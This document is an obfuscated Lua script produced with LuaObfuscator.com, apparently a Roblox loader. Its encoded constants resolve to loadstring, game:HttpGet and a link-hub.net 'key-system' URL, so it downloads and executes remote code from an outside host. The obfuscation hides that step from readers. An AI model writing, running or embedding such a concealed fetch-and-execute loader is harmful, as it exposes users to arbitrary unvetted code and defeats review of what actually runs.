--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v101=v5(v84,v19);v19=nil;return v101;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(2 -1)) -(v32-(620 -(555 + 58 + 6)))) + (932 -(857 + 74)))) ;return v85-(v85%(569 -(367 + 201))) ;else local v86=(1321 -394) -(214 + 713) ;local v87;while true do if (v86==0) then v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (878 -(282 + (1660 -(68 + 997))))) or (1637 -(1523 + 114)) ;end end end end local function v21() local v34=1270 -(226 + 1044) ;local v35;while true do if (v34==(4 -3)) then return v35;end if (v34==(117 -(32 + (1042 -(892 + 65))))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=(2 -1) + 0 ;end end end local function v22() local v36=0;local v37;local v38;while true do if (v36==(0 -(0 -0))) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(87 + 263)) ;v36=181 -(67 + 84 + 29) ;end if (v36==(1 + 0)) then return (v38 * 256) + v37 ;end end end local function v23() local v39,v40,v41,v42=v1(v16,v18,v18 + 3 );v18=v18 + (15 -11) ;return (v42 * 16777216) + (v41 * (66488 -(802 + 150))) + (v40 * (689 -433)) + v39 ;end local function v24() local v43=v23();local v44=v23();local v45=(1 + 0) -0 ;local v46=(v20(v44,(1 -0) + 0 ,1017 -((1353 -(145 + 293)) + 82) ) * (2^32)) + v43 ;local v47=v20(v44,59 -38 ,19 + 12 );local v48=((v20(v44,41 -9 )==(1188 -(1069 + (548 -(44 + 386))))) and  -(2 -1)) or (1 -0) ;if (v47==0) then if (v46==(0 + 0)) then return v48 * 0 ;else local v90=0;while true do if (v90==(0 -0)) then v47=1 + (1486 -(998 + 488)) ;v45=(252 + 539) -(368 + 347 + 76) ;break;end end end elseif (v47==(6433 -4386)) then return ((v46==(18 -(10 + 8))) and (v48 * (1/(0 -(772 -(201 + 571)))))) or (v48 * NaN) ;end return v8(v48,v47-(1465 -(416 + (1164 -(116 + 1022)))) ) * (v45 + (v46/(2^(165 -113)))) ;end local function v25(v49) local v50=0 -0 ;local v51;local v52;while true do if (v50==1) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=2 + 0 ;end if (v50==3) then return v6(v52);end if (v50==(7 -5)) then v52={};for v91=3 -2 , #v51 do v52[v91]=v2(v1(v3(v51,v91,v91)));end v50=862 -(814 + 45) ;end if (v50==((885 -(261 + 624)) -0)) then v51=nil;if  not v49 then v49=v23();if (v49==(0 + 0)) then return "";end end v50=1 + (1080 -(1020 + 60)) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0 -0 ;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67==(1824 -(1195 + 629))) then local v93=(function() return 0 -0 ;end)();while true do if (v93==(242 -(187 + 54))) then v67=(function() return 781 -(162 + 618) ;end)();break;end if (v93==(0 + 0)) then if (v53~=(0 + 0)) then else local v105=(function() return 374 -(123 + 251) ;end)();local v106=(function() return;end)();while true do if (v105==0) then v106=(function() return 0 -0 ;end)();while true do if (v106==(0 -0)) then v54=(function() return function(v168,v169,v170) local v171=(function() return 698 -(208 + 490) ;end)();while true do if ((0 + 0)~=v171) then else local v172=(function() return 0;end)();while true do if (v172~=(1000 -(451 + 549))) then else v168[v169-#"~" ]=(function() return v170();end)();return v168,v169,v170;end end end end end;end)();v55=(function() return {};end)();v106=(function() return 1 + 0 ;end)();end if (v106~=(838 -(660 + 176))) then else v53=(function() return 1 + 0 ;end)();break;end if (v106==1) then v56=(function() return {};end)();v57=(function() return {};end)();v106=(function() return 2;end)();end end break;end end end if (v53~=1) then else v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v60=(function() return {};end)();for v111= #"{",v59 do local v112=(function() return 202 -(14 + 188) ;end)();local v113=(function() return;end)();local v114=(function() return;end)();local v115=(function() return;end)();while true do if (v112==0) then v113=(function() return 675 -(534 + 141) ;end)();v114=(function() return nil;end)();v112=(function() return 1 + 0 ;end)();end if (v112==(1 + 0)) then v115=(function() return nil;end)();while true do if (v113~=(0 -0)) then else local v166=(function() return 0 + 0 ;end)();while true do if (v166==(1 + 0)) then v113=(function() return 1;end)();break;end if ((1581 -(1535 + 46))==v166) then v114=(function() return v21();end)();v115=(function() return nil;end)();v166=(function() return 1 + 0 ;end)();end end end if (v113==(1 -0)) then if (v114== #"<") then v115=(function() return v21()~=(0 -0) ;end)();elseif (v114==(5 -3)) then v115=(function() return v24();end)();elseif (v114== #"xnx") then v115=(function() return v25();end)();end v60[v111]=(function() return v115;end)();break;end end break;end end end v53=(function() return 2 + 0 ;end)();end v93=(function() return 1;end)();end end end if ((1 + 0)~=v67) then else if (v53==(3 -1)) then v58[ #"-19"]=(function() return v21();end)();for v102= #"}",v23() do local v103=(function() return v21();end)();if (v20(v103, #"{", #"}")==0) then local v107=(function() return 396 -(115 + 281) ;end)();local v108=(function() return;end)();local v109=(function() return;end)();local v110=(function() return;end)();while true do if (v107==3) then if (v20(v109, #"xnx", #"xxx")== #"]") then v110[ #"0313"]=(function() return v60[v110[ #"http"]];end)();end v55[v102]=(function() return v110;end)();break;end if (v107==(1468 -(899 + 568))) then local v152=(function() return 0;end)();local v153=(function() return;end)();while true do if (v152~=(0 + 0)) then else v153=(function() return 0 -0 ;end)();while true do if ((0 -0)==v153) then v110=(function() return {v22(),v22(),nil,nil};end)();if (v108==(0 + 0)) then local v173=(function() return 0 -0 ;end)();local v174=(function() return;end)();while true do if (v173==(0 + 0)) then v174=(function() return 0 -0 ;end)();while true do if (v174~=(867 -(550 + 317))) then else v110[ #"xnx"]=(function() return v22();end)();v110[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v108== #"}") then v110[ #"xxx"]=(function() return v23();end)();elseif (v108==(1458 -(282 + 1174))) then v110[ #"gha"]=(function() return v23() -((813 -(569 + 242))^(22 -6)) ;end)();elseif (v108~= #"-19") then else local v180=(function() return 0 -0 ;end)();local v181=(function() return;end)();while true do if (v180==(0 -0)) then v181=(function() return 0;end)();while true do if (v181~=0) then else v110[ #"-19"]=(function() return v23() -((1026 -(706 + 318))^(1267 -(721 + 530))) ;end)();v110[ #".com"]=(function() return v22();end)();break;end end break;end end end v153=(function() return 1272 -(945 + 326) ;end)();end if (v153==(2 -1)) then v107=(function() return 2;end)();break;end end break;end end end if (v107~=(2 + 0)) then else if (v20(v109, #" ", #"|")~= #",") then else v110[702 -(271 + 429) ]=(function() return v60[v110[2]];end)();end if (v20(v109,2,287 -(134 + 151) )~= #"\\") then else v110[ #"-19"]=(function() return v60[v110[ #"91("]];end)();end v107=(function() return 1668 -(970 + 695) ;end)();end if (v107==(0 -0)) then local v154=(function() return 1086 -(461 + 625) ;end)();while true do if (v154==(1990 -(582 + 1408))) then v108=(function() return v20(v103,1290 -(993 + 295) , #"xxx");end)();v109=(function() return v20(v103, #"xnxx",20 -14 );end)();v154=(function() return 1 + 0 ;end)();end if (1==v154) then v107=(function() return 1 -0 ;end)();break;end end end end end end for v104= #"[",v23() do v56,v104,v28=(function() return v54(v56,v104,v28);end)();end return v58;end break;end end end end local function v29(v61,v62,v63) local v64=v61[1 + 0 ];local v65=v61[1 + 1 ];local v66=v61[1 + 2 ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1 + 0 ;local v73= -(530 -(406 + (166 -43)));local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v88=0 + 0 + 0 ,v76 do if (v88>=v70) then v74[v88-v70 ]=v75[v88 + (1323 -(1249 + 73)) ];else v78[v88]=v75[v88 + 1 + 0 ];end end local v79=(v76-v70) + (1146 -(466 + 679)) ;local v80;local v81;while true do local v89=0;while true do if (v89==(1 + 0)) then if (v81<=(980 -(553 + 424))) then if ((v81<=((858 -(564 + 292)) -1)) or (142>=4749)) then if (v81==(0 + 0)) then v78[v80[5 -3 ]]=v63[v80[2 + 1 ]];else do return;end end elseif (v81==(2 -0)) then local v118=v80[1902 -((319 -213) + 1794) ];local v119=v78[v80[1 + 2 ]];v78[v118 + 1 + 0 ]=v119;v78[v118]=v119[v80[11 -7 ]];else v78[v80[(309 -(244 + 60)) -3 ]]();end elseif ((3926<=4134) and (v81<=(13 -8))) then if ((v81>(118 -(4 + 110))) or (164>=2785)) then v78[v80[2]]=v80[3];else local v125=v80[586 -(57 + 527) ];v78[v125]=v78[v125](v13(v78,v125 + 1 ,v73));end elseif (v81==(1433 -(41 + 1386))) then local v127=103 -(17 + 86) ;local v128;local v129;local v130;local v131;while true do if (((4 -3)==v127) or (525==2109)) then v73=(v130 + v128) -(1 + 0 + 0) ;v131=(476 -(41 + 435)) -0 ;v127=5 -3 ;end if ((33==33) and (v127==((1169 -(938 + 63)) -(122 + 44)))) then for v161=v128,v73 do v131=v131 + (1 -0) ;v78[v161]=v129[v131];end break;end if (v127==(0 -0)) then v128=v80[2 + 0 ];v129,v130=v71(v78[v128](v13(v78,v128 + 1 + 0 ,v80[734 -(476 + 255) ])));v127=1 -0 ;end end else local v132;local v133,v134;local v135;local v136;v78[v80[67 -(24 + 6 + 35) ]]=v63[v80[3 + (1125 -(936 + 189)) ]];v72=v72 + 1 ;v80=v68[v72];v78[v80[1259 -(1043 + 214) ]]=v63[v80[11 -(3 + 5) ]];v72=v72 + (1 -0) ;v80=v68[v72];v136=v80[1214 -(323 + 889) ];v135=v78[v80[1 + 2 ]];v78[v136 + (2 -1) ]=v135;v78[v136]=v135[v80[340 -(144 + 192) ]];v72=v72 + (581 -(361 + 219)) ;v80=v68[v72];v78[v80[322 -(53 + (1880 -(1565 + 48))) ]]=v80[1 + 2 ];v72=v72 + (414 -(15 + 398)) ;v80=v68[v72];v136=v80[984 -(18 + 964) ];v133,v134=v71(v78[v136](v13(v78,v136 + (3 -2) ,v80[1507 -(363 + 705 + 436) ])));v73=(v134 + v136) -(1 + 0) ;v132=0 + 0 ;for v155=v136,v73 do local v156=850 -(20 + 830) ;while true do if (v156==(1138 -(782 + 356))) then v132=v132 + 1 + 0 ;v78[v155]=v133[v132];break;end end end v72=v72 + (127 -(116 + 10)) ;v80=v68[v72];v136=v80[2 + 0 ];v78[v136]=v78[v136](v13(v78,v136 + 1 + 0 ,v73));v72=v72 + (739 -(542 + 196)) ;v80=v68[v72];v78[v80[3 -(268 -(176 + 91)) ]]();v72=v72 + (2 -1) + 0 ;v80=v68[v72];do return;end end v72=v72 + (2 -1) ;break;end if (v89==(0 + 0)) then v80=v68[v72];v81=v80[3 -2 ];v89=1 + 0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403293O00682O7470733A2O2F6C696E6B2D6875622E6E65742F2O312O393433392F6B65792D73797374656D2D3100083O0012073O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
